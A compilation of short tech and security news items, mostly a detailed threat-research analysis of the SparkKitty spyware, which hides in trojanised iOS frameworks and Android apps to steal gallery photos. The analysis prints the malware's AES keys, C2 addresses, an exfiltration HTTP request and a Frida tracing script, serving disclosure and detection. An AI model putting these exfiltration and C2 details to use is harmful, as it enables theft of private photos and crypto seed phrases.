A metà maggio 2025, Cloudflare ha bloccato il più grande attacco DDoS mai registrato: ben 7,3 terabit al secondo (Tbps). Questo evento segue di poco la pubblicazione del report sulle minacce DDoS per il primo trimestre del 2025 avvenuta il 27 aprile 2025, in cui era stato evidenziato attacchi che raggiungevano i 6,5 Tbps e 4,8 miliardi di pacchetti al secondo (pps).

37,4 terabyte non sono una cifra sbalorditiva per le dimensioni odierne, ma scaricarne 37,4 terabyte in soli 45 secondi lo è.

Equivale a inondare la rete con oltre 9.350 film in HD o a guardare in streaming 7.480 ore di video ad alta definizione senza interruzioni (quasi un anno di maratona di visione di serie TV consecutive) in soli 45 secondi.

Se si trattasse di musica, scaricheresti circa 9,35 milioni di brani in meno di un minuto, abbastanza per tenere impegnato un ascoltatore per 57 anni di fila. Immagina di scattare 12,5 milioni di foto ad alta risoluzione con il tuo smartphone senza mai esaurire lo spazio di archiviazione: anche se ne scattassi una al giorno, staresti lì a cliccare per 4.000 anni, ma in 45 secondi.

L’attacco ha preso di mira un cliente di Cloudflare, un provider di hosting, che utilizza Magic Transit per difendere la propria rete IP. I provider di hosting e le infrastrutture Internet critiche sono sempre più spesso bersaglio di attacchi DDoS, come riportato nell’ultimo rapporto sulle minacce DDoS

L’immagine sottostante mostra una campagna di attacchi condotta tra gennaio e febbraio 2025, che ha sferrato oltre 13,5 milioni di attacchi DDoS contro l’infrastruttura di Cloudflare e i provider di hosting protetti da Cloudflare.

L’attacco ha colpito a tappeto una media di 21.925 porte di destinazione di un singolo indirizzo IP, con un picco di 34.517 porte di destinazione al secondo. L’attacco ha avuto origine anche da una distribuzione simile di porte sorgente.

L’attacco da 7,3 Tbps è stato un attacco DDoS multivettore. Circa il 99,996% del traffico dell’attacco è stato classificato come flood UDP. Tuttavia, il restante 0,004%, pari a 1,3 GB del traffico dell’attacco, è stato identificato come attacchi di riflessione QOTD, attacco di riflessione Echo, attacco di riflessione NTP, attacco di flood UDP Mirai, flood Portmap e attacchi di amplificazione RIP

L'articolo Cloudflare mitiga un attacco da 7,3 terabit al secondo. Immagina 9350 film in HD scaricati in 45 secondi proviene da il blog della sicurezza informatica.

L’avvocata Filomena Gallo, Segretaria nazionale dell’Associazione Luca Coscioni, partecipa al dibattito e alla proiezione del film La stanza accanto di Pedro Almodovar. La proiezione è organizzata da Rete dei Diritti, in collaborazione con Arianteo.

L’appuntamento è per mercoledì 9 luglio 2025 alle ore 20:45 a Palazzo Reale, a Milano.

Con Filomena Gallo partecipa anche Valeria Imbrogno, psicologa e compagna di DJ Fabo. Presenta e coordina Ilio Pacini Mannucci, magistrato del Tribunale di Milano. I biglietti sono acquistabili in loco.

L'articolo Filomena Gallo partecipa alla proiezione del film “La stanza accanto” proviene da Associazione Luca Coscioni.

Time series of O2 (blue) and VGADM (red). (Credit: Weijia Kuang, Science Advances, 2025)
In an Earth-sized take on the age-old ‘correlation or causality’ question, researchers have come across a fascinating match between Earth’s magnetic field and its oxygen levels since the Cambrian explosion, about 500 million years ago. The full results by [Weijia Kuang] et al. were published in Science Advances, where the authors speculate that this high correlation between the geomagnetic dipole and oxygen levels as recorded in the Earth’s geological mineral record may be indicative of the Earth’s geological processes affecting the evolution of lifeforms in its biosphere.

As with any such correlation, one has to entertain the notion that said correlation might be spurious or indirectly related before assuming a strong causal link. Here it is for example known already that the solar winds affect the Earth’s atmosphere and with it the geomagnetic field, as more intense solar winds increase the loss of oxygen into space, but this does not affect the strength of the geomagnetic field, just its shape. The question is thus whether there is a mechanism that would affect this field strength and consequently cause the loss of oxygen to the solar winds to spike.

Here the authors suggest that the Earth’s core dynamics – critical to the geomagnetic field – may play a major role, with conceivably the core-mantle interactions over the course of millions of years affecting it. As supercontinents like Pangea formed, broke up and partially reformed again, the impact of this material solidifying and melting could have been the underlying cause of these fluctuations in oxygen and magnetic field strength levels.

Although hard to say at this point in time, it may very well be that this correlation is causal, albeit as symptoms of activity of the Earth’s core and liquid mantle.

hackaday.com/2025/06/23/earths…

IT'S MONDAY, AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and here's a quick scheduling update. I'm taking the first two weeks off in July, so next week's newsletter will be the last until July 14.

Don't worry. I've got some programming planned for my upcoming break, but FYI.

— The United States is pursuing a "cake-and-eat-it" strategy on digital policymaking. It's leaving many confused, at home and abroad.

— The United Kingdom just passed the world's second mandate requiring social media companies to open up to outsiders in the name of accountability and transparency.

— Social media dominates how we all access information online. But artificial intelligence tools are likely to upend that status-quo.

Let's get started:

digitalpolitics.co/newsletter0…

In Europa sta prendendo piede una preoccupante tendenza criminale : bande criminali utilizzano app crittografate per reclutare adolescenti di appena 14 anni per commettere crimini violenti, tra cui omicidi su commissione.

Non si tratta di drammi polizieschi, ma di episodi reali in cui i giovani vengono coinvolti nel cosiddetto modello della “violenza come servizio“. Attraverso servizi di messaggistica sicura, i criminali offrono denaro per gli attacchi e i confini internazionali non sono più un ostacolo.

L’indagine, avviata dall’Autorità Nazionale Danese per i Reati Gravi con il supporto della polizia svedese, ha già portato ad arresti. Tra gli episodi chiave figura la sparatoria di Kokkedal del 7 maggio 2025. Sette persone di età compresa tra 14 e 26 anni sono state arrestate o si sono consegnate volontariamente alle autorità, tra cui residenti in Svezia e Marocco. Due diciottenni svedesi sono sospettati di reclutamento attivo: secondo gli inquirenti, avrebbero contribuito a organizzare i crimini e fornito armi e rifugi ai partecipanti.

In risposta alla minaccia, Europol ha attivato la task force internazionale OTF GRIMM, creata nell’aprile 2025. Ne fanno parte Danimarca, Svezia, Germania, Francia, Finlandia, Paesi Bassi e altri Paesi. L’obiettivo principale è quello di smascherare l’infrastruttura digitale attraverso cui vengono coordinati tali crimini.

Secondo il direttore del Centro europeo per la criminalità organizzata, le moderne reti criminali agiscono in modo pragmatico e cinico, delegando compiti pericolosi agli adolescenti e promettendo loro soldi facili.

Vale la pena notare che le applicazioni crittografate sono state a lungo utilizzate in altri schemi criminali. Ad esempio, nell’importante indagine internazionale sulla rete “764“, associata allo sfruttamento dei minori, anche i principali sospettati provenienti da Stati Uniti e Grecia hanno coordinato le loro azioni tramite messaggi anonimi.

Le autorità stanno intensificando le attività di prevenzione: vengono pubblicate raccomandazioni per genitori e insegnanti per aiutarli a individuare tempestivamente i segnali d’allarme. Cambiamenti improvvisi nel comportamento, la comparsa di oggetti costosi senza una causa apparente. Europol sottolinea che un intervento precoce può salvare gli adolescenti da un percorso pericoloso.

L’indagine è in corso. L’obiettivo è trovare gli organizzatori e chiudere i canali che trasformano le chat sicure in strumenti di influenza criminale.

L'articolo Omicidi come un drink! Il dark web recluta ragazzini con App crittografate in Europa proviene da il blog della sicurezza informatica.

In November 2023, EDRi and members filed a complaint against the French decree implementing the EU regulation addressing the dissemination of 'terrorist content' online. Last week, the French supreme administrative court rejected our arguments and refused to refer the case to the Court of Justice of the European Union.

The post French Administrative Supreme Court illegitimately buries the debate over internet censorship law appeared first on European Digital Rights (EDRi).

QR codes are something that we all take for granted in this day and age. There are even a million apps to create your own QR codes, but what if you want to make a barcode? How about making a specific kind of barcode that follows UPC-E, CODE 39, or even the infamous… CODABAR? Well, it might be more difficult to find a single app that can handle all those different standards. Using “yet-another-web-app”, Barcode Tool – Generator & Scanner, you can rid these worries, created by [Ricardo de Azambuja].

When going to [Ricardo]’s simple application, you will find a straightforward interface that allows you to make far more different strips and square patterns than you’ve ever imagined. Of course, starting with the common QR code, you can create custom overlaid codes like many other QR generators. More uniquely, there are options for any barcode under the sun to help organize your hacker workspace. If you don’t want to download an app to scan the codes, you can even use the included scanner function.

If you want to use the web app, you can find it here! In-depth solutions to rather simple problems are something we strive to provide here at Hackaday, and this project is no exception. However, if you want something more physical, check out this specialized outdoor city cooking station.

hackaday.com/2025/06/23/visual…

In January 2025, we uncovered the SparkCat spyware campaign, which was aimed at gaining access to victims’ crypto wallets. The threat actor distributed apps containing a malicious SDK/framework. This component would wait for a user to open a specific screen (typically a support chat), then request access to the device’s gallery. It would then use an OCR model to select and exfiltrate images of interest. Although SparkCat was capable of searching for any text within images, that campaign specifically targeted photos containing seed phrases for crypto wallets. The malware was distributed through unofficial sources as well as Google Play and App Store. Now, we’ve once again come across a new type of spyware that has managed to infiltrate the official app stores. We believe it is connected to SparkCat and also targets the cryptocurrency assets of its victims.

Here are the key facts about this new threat:

• The malware targets both iOS and Android devices, and it is spreading in the wild as well as through the App Store and Google Play.
• On iOS, the malicious payload is delivered as frameworks (primarily mimicking AFNetworking.framework or Alamofire.framework) or obfuscated libraries disguised as libswiftDarwin.dylib, or it can be embedded directly into the app itself.
• The Android-specific Trojan comes in both Java and Kotlin flavors; the Kotlin version is a malicious Xposed module.
• While most versions of this malware indiscriminately steal all images, we discovered a related malicious activity cluster that uses OCR to pick specific pictures.
• The campaign has been active since at least February 2024.

It all began with a suspicious online store…

During routine monitoring of suspicious links, we stumbled upon several similar-looking pages that were distributing TikTok mods for Android. In these modified versions, the app’s main activities would trigger additional code. The code would then request a Base64-encoded configuration file from hxxps://moabc[.]vip/?dev=az. A sample decoded configuration file is shown below.
{
"links": {
"shopCenter": "https://h1997.tiktokapp.club/wap/?",
"goodsList": "https://h1997.tiktokapp.club/www/?",
"orderList": "https://h1997.tiktokapp.club/www/?",
"reg": "https://www.baidu.com",
"footbar": "https://www.baidu.com"
}
}
The links from the configuration file were displayed as buttons within the app. Tapping these opened WebView, revealing an online store named TikToki Mall that accepted cryptocurrency as payment for consumer goods. Unfortunately, we couldn’t verify if it was a legitimate store, as users had to register with an invitation code to make a purchase.

Although we didn’t find any other suspicious functionality within the apps, a gut feeling told us to dig deeper. We decided to examine the code of the web pages distributing the apps, only to find a number of interesting details suggesting they might also be pushing iOS apps.
<div class="t-name">
<div class="tit">
{{if ext=="ipa"}}
<i class="iconfont icon-iphone" style="font-size:inherit;margin-right:5px"></i>
{{else}}
<i class="iconfont icon-android" style="font-size:inherit;margin-right:5px"></i>
{{/if}}

iOS app delivery method

And sure enough, visiting the website on an iPhone triggers a series of redirects, ultimately landing the user on a page that crudely mimics the App Store and prompts them to download an app.

iOS app download page

As you know, iOS doesn’t just let you download and run any app from a third-party source. However, Apple provides members of the Apple Developer Program with so-called provisioning profiles. These allow a developer certificate to be installed on a user device. iOS then uses this certificate to verify the app’s digital signature and determine if it can be launched. Besides the certificate, a provisioning profile contains its expiration date and the permissions to be granted to the app, as well as other information about the developer and the app. Once the profile is installed on a device, the certificate becomes trusted, allowing the app to run.

Provisioning profiles come in several types. Development profiles are used for testing apps and can only be distributed to a predefined set of devices. App Store Connect profiles allow for publishing an app to the App Store. Enterprise profiles were created to allow organizations to develop internal-use apps and install them on their employees’ devices without publishing them on the App Store and without any restrictions on which devices they can be installed on. Although the Apple Developer Program requires a paid membership and developer verification by Apple, Enterprise profiles are often exploited. They are used not only by developers of apps unsuitable for the App Store (online casinos, cracks, cheats, or illegal mods of popular apps) but also by malware creators.
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>AppIDName</key>
<string>rdcUniApp</string>
<key>ApplicationIdentifierPrefix</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>CreationDate</key>
<date>2025-01-20T06:59:55Z</date>
<key>Platform</key>
<array>
<string>iOS</string>
<string>xrOS</string>
<string>visionOS</string>
</array>
<key>IsXcodeManaged</key>
<false/>
<key>DeveloperCertificates</key>
<array>
<data>OMITTED</data>
</array>

<key>DER-Encoded-Profile</key>
<data>OMITTED</data>

<key>Entitlements</key>
<dict>

<key>application-identifier</key>
<string>EHQ3N2D5WH.com.ss-tpc.rd.rdcUniApp</string>

<key>keychain-access-groups</key>
<array>
<string>EHQ3N2D5WH.*</string>
<string>com.apple.token</string>
</array>

<key>get-task-allow</key>
<false/>

<key>com.apple.developer.team-identifier</key>
<string>EHQ3N2D5WH</string>

</dict>
<key>ExpirationDate</key>
<date>2026-01-20T06:59:55Z</date>
<key>Name</key>
<string>syf</string>
<key>ProvisionsAllDevices</key>
<true/>
<key>TeamIdentifier</key>
<array>
<string>EHQ3N2D5WH</string>
</array>
<key>TeamName</key>
<string>SINOPEC SABIC Tianjin Petrochemical Co. Ltd.</string>
<key>TimeToLive</key>
<integer>365</integer>
<key>UUID</key>
<string>55b65f87-9102-4cb9-934a-342dd2be8e25</string>
<key>Version</key>
<integer>1</integer>
</dict>
</plist>

Example of a provisioning profile installed to run a malicious TikTok mod
In the case of the malicious TikTok mods, the attackers used an Enterprise profile, as indicated by the following key in its body:
<key>ProvisionsAllDevices</key>
<true/>
It’s worth noting that installing any provisioning profile requires direct user interaction, which looks like this:

Profile installation flow

Looking for copper, found gold

Just like its Android counterpart, the installed iOS app contained a library that embedded links to a suspicious store within the user’s profile window. Tapping these opened them in WebView.

Suspicious store opened inside a TikTok app

It seemed like a straightforward case: another mod of a popular app trying to make some money. However, one strange detail in the iOS version caught our attention. On every launch, the app requested access to the user’s photo gallery – highly unusual behavior for the original TikTok. Furthermore, the library containing the store didn’t have code accessing the photo gallery, and the Android version never requested image permissions. We were compelled to dig a little deeper and examine the app’s other dependencies. This led to the discovery of a malicious module pretending to be AFNetworking.framework. For a touch of foreshadowing, let’s spotlight a curious detail: certain apps referred to it as Alamofire.framework, but the code itself stayed exactly the same. The original version of AFNetworking is an open-source library that provides developers with a set of interfaces for convenient network operations.

The malicious version differs from the original by a modified AFImageDownloader class and an added AFImageDownloaderTool class. Interestingly, the authors didn’t create separate initialization functions or alter the library’s exported symbols to launch the malicious payload. Instead, they took advantage of a feature in Objective-C that allows classes to define a special load selector, which is automatically called when the app is loading. In this case, the entry point for the malicious payload was the +[AFImageDownloader load] selector, which does not exist in the original framework.

Malicious class entry point

The malicious payload functions as follows:

1. It checks if the value of the ccool key in the app’s main Info.plist configuration file matches the string 77e1a4d360e17fdbc. If the two differ, the malicious payload will not proceed.
2. It retrieves the Base64-encoded value of the ccc key from the framework’s Info.plist file. This value is decoded and then decrypted using AES-256 in ECB mode with the key p0^tWut=pswHL-x>>:m?^.^)W padded with nulls to reach a length of 32 bytes. Some samples were also observed using the key J9^tMnt=ptfHL-x>>:m!^.^)A. If there’s no ccc key in the configuration or the key’s value is empty, the malware attempts to use the key com.tt.cf to retrieve an encrypted string from UserDefaults – a database where the app can store information for use in subsequent launches.
3. The decrypted value is a list of URLs from which the malware fetches additional payloads, encrypted using the same method. This new ciphertext contains a set of C2 addresses used for exfiltrating stolen photos.
4. The final step before uploading the photos is to receive authorization from the C2 server. To do this, the malware sends a GET request to the /api/getImageStatus endpoint, transmitting app details and the user’s UUID. The server responds with the following JSON:{"msg":"success","code":0,"status":"1"}The code field tells the app whether to repeat the request after a delay, with 0 meaning no, and the status field indicates whether it has permission to upload the photos.
5. Next, the malware requests access to the user’s photo gallery. It then registers a callback function to monitor for any changes within the gallery. The malware exfiltrates any accessible photos that have not already been uploaded. To keep track of which photos have been stolen, it creates a local database. If the gallery is modified while the app is running, the malware will attempt to access and upload the new images to the C2 server.

Photo exfiltration and upload

Data transmission is performed directly within the selector [AFImageDownloader receiptID:andPicID:] by making a PUT request to the /api/putImages endpoint. In addition to the image itself, information about the app and the device, along with unique user identifiers, is also sent to the server.
PUT /api/putImages HTTP/1.1
Host: 23.249.28.88:7777
Content-Type: multipart/form-data; boundary=Boundary+C9D8BE3781515E01
Connection: keep-alive
Accept: */*
User-Agent: TikTok/31.4.0 (iPhone; iOS 14.8; Scale/3.00)
Accept-Language: en-US;q=1, ja-US;q=0.9, ar-US;q=0.8, ru-US;q=0.7
Content-Length: 80089
Accept-Encoding: gzip, deflate
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="appname"
TikTok
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="buid"
com.zhiliaoapp.musically
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="device"
ios
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="userId"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="uuid"
xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx/Lx/xxx
--Boundary+C9D8BE3781515E01
Content-Disposition: form-data; name="image"; filename="<name>"
Content-Type: image/jpeg
......JFIF.....H.H.....LExif..MM.*...................i.........&.................e.......... ........8Photoshop 3.0.8BIM........8BIM.%................ ...B~...4ICC_PROFILE......$appl....mntrRGB XYZ .......

Digging deeper

When we found a spyware component in the modified iOS version of TikTok, we immediately wondered if the Trojan had an Android counterpart. Our initial search led us to a bunch of cryptocurrency apps. These apps had malicious code embedded in their entry points. It requests a configuration file with C2 addresses and then decrypts it using AES-256 in ECB mode. These decrypted addresses are then used by the Trojan to send a GET request to /api/anheartbeat. The request includes information about the infected app. The Trojan expects a JSON response. If the code field is 0, it means communication with that C2 is allowed. The status flag in the JSON determines whether the Trojan can send the victim’s images to the server.

Checking C2 addresses

The main functionality of this malware – stealing images from the gallery – works in two stages. First, the malware checks the status flag. If it’s set to allow file uploads, the Trojan then checks the contents of a file named aray/cache/devices/.DEVICES on external storage. The first time it runs, the Trojan writes a hexadecimal number to this file. The number is an MD5 hash of a string containing the infected device’s IMEI, MAC address, and a random UUID. The content of this file is then compared to the string B0B5C3215E6D. If the content is different, the Trojan uploads images from the gallery, along with infected device info, to the command server via a PUT request to /api/putDataInfo. If the content is the same, it only uploads the third image from the end of an alphabetically sorted list. It’s highly likely the attackers use this specific functionality for debugging their malicious code.

Uploading image and device information

Later, we discovered other versions of this Trojan embedded in casino apps. These were loaded using the LSPosed framework, which is designed for app code hooking. Essentially, these Trojan versions acted as malicious Xposed modules. They would hook app entry points and execute code similar to the malware we described earlier, but with a few interesting twists:

1. The C2 address storage was located in both the module’s resources and directly within the malware code. Typically, these were two different addresses, and both were used to obtain C2 information.

Procedure for obtaining C2 addresses

1. Among the decrypted C2 addresses, the Trojan picks the one corresponding to the fastest server. It does this by sending a request to each server sequentially. If the request is successful, it records the response time. The shortest time then determines which C2 server is used. Note that this algorithm could have been implemented without needing to store intermediate values.

Finding the shortest response time

1. The code uses custom names for classes, methods, and fields.
2. It is written in Kotlin. Other versions we found were written in Java.

Spyware in official app stores

One of the Android Java apps containing a malicious payload was a messaging app with crypto exchange features. This app was uploaded to Google Play and installed over 10,000 times. It was still available in the store at the time of this research. We notified Google about it.

Infected app on Google Play

Another infected Android app we discovered is named 币coin and distributed through unofficial sources. However, it also has an iOS version. We found it on the App Store and alerted Apple to the presence of the infected app in their store.

Infected app page on the App Store

In both the Android and iOS versions, the malicious payload was part of the app itself, not of a third-party SDK or framework. In the iOS version, the central AppDelegate class, which manages the app’s lifecycle, registers its selector [AppDelegate requestSuccess:] as a handler for responses returned by requests sent to i.bicoin[.]com[.]cn.

Checking the server response and sending a photo

{
code = 0;
data = {
27 = (
);
50002 = (
{
appVersion = "";
cTime = 1696304011000;
id = 491;
imgSubTitle = "";
imgTitle = "\U70ed\U5f00\U5173\Uff08\U65b0\Uff09";
imgType = 50002;
imgUrl = 0;
imgUrlSub = "";
isFullScreen = 0;
isNeed = 1;
isSkip = 1;
langType = all;
operator = 0;
skipUrl = "";
sort = 10000;
source = 0;
type = 0;
uTime = <timestamp>;
}
);
};
dialog = {
cancelAndClose = 0;
cancelBtn = "";
cancelColor = "";
code = 0;
confirmBtn = "";
confirmColor = "";
content = "";
contentColor = "";
time = "";
title = OK;
titleColor = "";
type = 3;
url = "";
};Sample server response
In the response, the imgUrl field contains information about the permission to send photos (1 means granted). Once the Trojan gets the green light, it uses a similar method to what we described earlier: it downloads an encrypted set of C2 addresses and tries sending the images to one of them. By default, it’ll hit the first address on the list. If that one’s down, the malware just moves on to the next. The photo-sending functionality is implemented within the KYDeviceActionManager class.

Retrieving and sending photos

Suspicious libcrypto.dylib mod

During our investigation, we also stumbled upon samples that contained another suspicious library: a modified version of OpenSSL’s cryptographic primitives library, libcrypto.dylib. It showed up under names like wc.dylib and libswiftDarwin.dylib, had initialization functions that were obfuscated with LLVM, and contained a link to a configuration we’d seen before in other malicious frameworks. It also imported the PHPhotoLibrary class, used for gallery access in the files we mentioned earlier. Sometimes the library was delivered alongside the malicious AFNetworking.framework/Alamofire.framework, sometimes not.

Unlike other variants of this malware, this particular library didn’t actually reach out to the malicious configuration file link embedded within it. That meant we had to manually dig for the code responsible for its initial communication with the C2. Even though these library samples are heavily obfuscated, some of them, like the sample with the hash c5be3ae482d25c6537e08c888a742832, still had cross-references to the part of the code where the encrypted configuration page URL was used. This function converted a URL string into an NSString object.

Section of obfuscated code for loading the malicious URL

Using Frida, we can execute any piece of code as a function, but simply converting a string to an NSString object isn’t enough to confirm the library’s malicious intent. So, we followed the cross-references up several levels. When we tried to execute the function that worked with the URL during its execution, we discovered it was making a GET request to the malicious URL. However, we couldn’t get a response right away; the server the URL pointed to was already inactive. To make the function run correctly, we used Frida to substitute the link with a working one, where we knew exactly what data it returned and how it was decrypted. By setting logging hooks on the objc_msgSend call and running the malicious function with a swapped URL, we got the info we needed about the calls. Below is the Frida script we used to do this:
function traceModule(impl, name)
{
console.log("Tracing " + name, impl);
var exit_log = 0;
Interceptor.attach(impl, {
onEnter: function(args) {
var bt = Thread.backtrace(this.context, Backtracer.ACCURATE);
if (!moduleMap) {
moduleMap = new ModuleMap();
}
var modules = bt.map(x => moduleMap.find(x)).filter(x => x != null).map(x => x.name);
// we want to trace only calls originating from malware dylib
if (modules.filter(x => x.includes('wc.dylib')).length > 0) {
exit_log = 1;
console.warn("\n*** entering " + name);
if(name.includes('objc_msgSend')) {
var sel = this.context.x1.readUtf8String();
if (sel.includes("stringWithCString:")) {
var s = this.context.x2.readUtf8String();
if (s.includes('.cn-bj.ufileos.com')) {
console.log("Replacing URL: ", s);
var news = Memory.allocUtf8String('https://data-sdk2.oss-accelerate.aliyuncs.com/file/SGTMnH951121');
this.context.x2 = news;
console.log("New URL: ", this.context.x2.readUtf8String());
}
else
console.log(s);
}
}

//print backtrace
console.log(bt.map(DebugSymbol.fromAddress).join("\n"));
}

},
onLeave: function(retval) {
if (exit_log == 1) {
console.warn("\n***extiting ", name);
console.log(this.context.x0.readByteArray(64));
}
}
});
}

var malInited = false;
var malFunc;
function callMalware() {
if (!malInited) {
malFunc = new NativeFunction(base.add(0x7A77CC), 'void', []);
traceModule(base.add(0x821360), 'objc_msgSend');
malInited = true;
}
malFunc();
}

var mname = "wc.dylib";
var base = Process.enumerateModules().filter(x=>x.name.includes(mname))[0].base;
console.log('Base address: ', base);
malFunc();
Our suspicions were confirmed: the malicious function indeed loads and decrypts the C2 address configuration from a given URL. It then uses this C2 for sending device data, following the same pattern we described earlier and using the same AES-256 key. Below is an excerpt from the function’s execution logs.
*** entering objc_msgSend
### Creating NSString object with decrypted string
[ 0x20193a010 stringWithCString:"http://84.17.37.155:8081" encoding: ]
0x102781be8 wc.dylib!0x7d1be8 (0x7d1be8)
0x1027590e8 wc.dylib!0x7a90e8 (0x7a90e8)

*** entering objc_msgSend
### Creating NSString with api endpoint decrypted somewhere in code
[ 0x20193a010 stringWithCString:"%@/api/getStatus?buid=%@&appname=%@&userId=%@" encoding: ]
0x10277cc50 wc.dylib!0x7ccc50 (0x7ccc50)
0x102783264 wc.dylib!0x7d3264 (0x7d3264)

### Here sample initiates HTTP request to decrypted C2 address and decrypts its response ###

*** entering objc_msgSend
### Getting server response as data object
[ 0x2022d5078 initWithData:encoding: ]
0x10277f4a4 wc.dylib!0x7cf4a4 (0x7cf4a4)
0x1afafcac4 CFNetwork!0x1dac4 (0x180a6cac4)

*** leaving objc_msgSend
### Server response in bytes

00000000 41 e9 92 01 a2 21 00 00 8c 07 00 00 01 00 00 00 A....!..........
00000010 2e 7b 22 6d 73 67 22 3a 22 73 75 63 63 65 73 73 .{"msg":"success
00000020 22 2c 22 63 6f 64 65 22 3a 30 2c 22 75 73 22 3a ","code":0,"us":
00000030 31 2c 22 73 74 61 74 75 73 22 3a 22 30 22 7d 00 1,"status":"0"}.
The function execution log above clearly shows it uses an IP address from the encrypted configuration file. Device data is sent to this IP’s /api/getStatus endpoint with arguments familiar from previous samples. We also see that the server’s response contains the code and status fields we’ve encountered before. All of this strongly suggests that this library is also involved in stealing user photos. The only thing we haven’t pinpointed yet is the exact conditions under which this malicious function activates. At startup, the library contacts a C2 whose address in encrypted within it, sending device information and expecting a JSON string response from the server. At the time of this research, we hadn’t found any samples with an active C2 address, so we don’t know the precise response it’s looking for. However, we assume that response – or subsequent responses – should contain the permission to start sending photos.

Another activity cluster?

During our research, we stumbled upon a significant number of pages offering for download various scam iOS apps in the PWA (progressive web app) format. At first glance, these pages seemed unrelated to the campaign we describe in this article. However, their code bore a striking resemblance to the pages distributing the malicious TikTok version, which prompted us to investigate how users were landing on them. While digging into the traffic sources, we uncovered ads for various scams and Ponzi schemes on popular platforms.

Scam platform account on YouTube

Some of these PWA-containing pages also included a section prompting users to download a mobile app. For Android users, the link downloaded an APK file that opened the scam platform via WebView.

App download links

Beyond just opening scam websites in WebView, these downloaded APKs had another function. The apps requested access to read storage. Once this was granted, they used the Loader API to register their content download event handler. This handler then selected all JPEG and PNG images. The images were processed using the Google ML Kit library designed for optical character recognition. ML Kit searched for text blocks and then broke them down into lines. If at least three lines containing a word with a minimum of three letters were found, the Trojan would send the image to the attackers’ server – its address was retrieved from Amazon AWS storage.

Code snippet for photo uploads

We’re moderately confident that this activity cluster is connected to the one described above. Here’s why:

1. The malicious apps also focus on cryptocurrency themes.
2. Similar tactics are employed: the C2 address is also hosted in cloud storage, and gallery content is exfiltrated.
3. The pages distributing iOS PWAs look similar to those used to download malicious TikTok mods.

Given this connection between the two activity clusters, we suspect the creators of the apps mentioned earlier might also be spreading them through social media ads.

Campaign goals and targets

Unlike SparkCat, the spyware we analyzed above doesn’t show direct signs of the attackers being interested in victims’ crypto assets. However, we still believe they’re stealing photos with that exact goal in mind. The following details lead us to these conclusions:

1. A crypto-only store was embedded within the TikTok app alongside the spyware.
2. Among the apps where the spyware was found, several were crypto-themed. For instance, 币coin in the App Store positions itself as a crypto information tracker, and the SOEX messaging app has various crypto-related features as well.
3. The main source for distributing the spyware is a network of cookie-cutter app download platforms. During our investigation, we found a significant number of domains that distributed both the described Trojan and PWAs (progressive web apps). Users were directed to these PWAs from various cryptocurrency scam and Ponzi scheme sites.

Our data suggests that the attackers primarily targeted users in Southeast Asia and China. Most of the infected apps we discovered were various Chinese gambling games, TikTok, and adult games. All these apps were originally aimed specifically at users in the regions mentioned above.
Furthermore, we believe this malware is linked to the SparkCat campaign, and here’s our reasoning:

• Some Android apps infected with SparkKitty were built with the same framework as the apps infected with SparkCat.
• In both campaigns, we found the same infected Android apps.
• Within the malicious iOS frameworks, we found debug symbols. They included file paths from the attackers’ systems, which pointed to where their projects were being built. These paths match what we previously observed in SparkCat.

Takeaways

Threat actors are still actively compromising official app stores, and not just for Android – iOS is also a target. The espionage campaign we uncovered uses various distribution methods: it spreads through apps infected with malicious frameworks/SDKs from unofficial sources, as well as through malicious apps directly on the App Store and Google Play. While not technically or conceptually complex, this campaign has been ongoing since at least the beginning of 2024 and poses a significant threat to users. Unlike the previously discovered SparkCat spyware, this malware isn’t picky about which photos it steals from the gallery. Although we suspect the attackers’ main goal is to find screenshots of crypto wallet seed phrases, other sensitive data could also be present in the stolen images.

Judging by the distribution sources, this spyware primarily targets users in Southeast Asia and China. However, it doesn’t have any technical limitations that would prevent it from attacking users in other regions.

Our security products return the following verdicts when detecting malware associated with this campaign:

• HEUR:Trojan-Spy.AndroidOS.SparkKitty.*
• HEUR:Trojan-Spy.IphoneOS.SparkKitty.*

Indicators of compromise

Infected Android apps

b4489cb4fac743246f29abf7f605dd15
e8b60bf5af2d5cc5c501b87d04b8a6c2
aa5ce6fed4f9d888cbf8d6d8d0cda07f
3734e845657c37ee849618e2b4476bf4
fa0e99bac48bc60aa0ae82bc0fd1698d
e9f7d9bc988e7569f999f0028b359720
a44cbed18dc5d7fff11406cc403224b9
2dc565c067e60a1a9656b9a5765db11d
66434dd4402dfe7dda81f834c4b70a82
d851b19b5b587f202795e10b72ced6e1
ce49a90c0a098e8737e266471d323626
cc919d4bbd3fb2098d1aeb516f356cca
530a5aa62fdcca7a8b4f60048450da70
0993bae47c6fb3e885f34cb9316717a3
5e15b25f07020a5314f0068b474fff3d
1346f987f6aa1db5e6deb59af8e5744a

Infected iOS apps

21ef7a14fee3f64576f5780a637c57d1
6d39cd8421591fbb0cc2a0bce4d0357d
c6a7568134622007de026d22257502d5
307a64e335065c00c19e94c1f0a896f2
fe0868c4f40cbb42eb58af121570e64d
f9ab4769b63a571107f2709b5b14e2bc
2b43b8c757c872a19a30dcdcff45e4d8
0aa1f8f36980f3dfe8884f1c6f5d6ddc
a4cca2431aa35bb68581a4e848804598
e5186be781f870377b6542b3cecfb622
2d2b25279ef9365420acec120b98b3b4
149785056bf16a9c6964c0ea4217b42b
931399987a261df91b21856940479634

Malicious iOS frameworks

8c9a93e829cba8c4607a7265e6988646
b3085cd623b57fd6561e964d6fd73413
44bc648d1c10bc88f9b6ad78d3e3f967
0d7ed6df0e0cd9b5b38712d17857c824
b0eda03d7e4265fe280360397c042494
fd4558a9b629b5abe65a649b57bef20c
1b85522b964b38de67c5d2b670bb30b1
ec068e0fc6ffda97685237d8ab8a0f56
f10a4fdffc884089ae93b0372ff9d5d1
3388b5ea9997328eb48977ab351ca8de
931085b04c0b6e23185025b69563d2ce
7e6324efc3acdb423f8e3b50edd5c5e5
8cfc8081559008585b4e4a23cd4e1a7f

Obfuscated malicious iOS libraries

0b7891114d3b322ee863e4eef94d8523
0d09c4f956bb734586cee85887ed5407
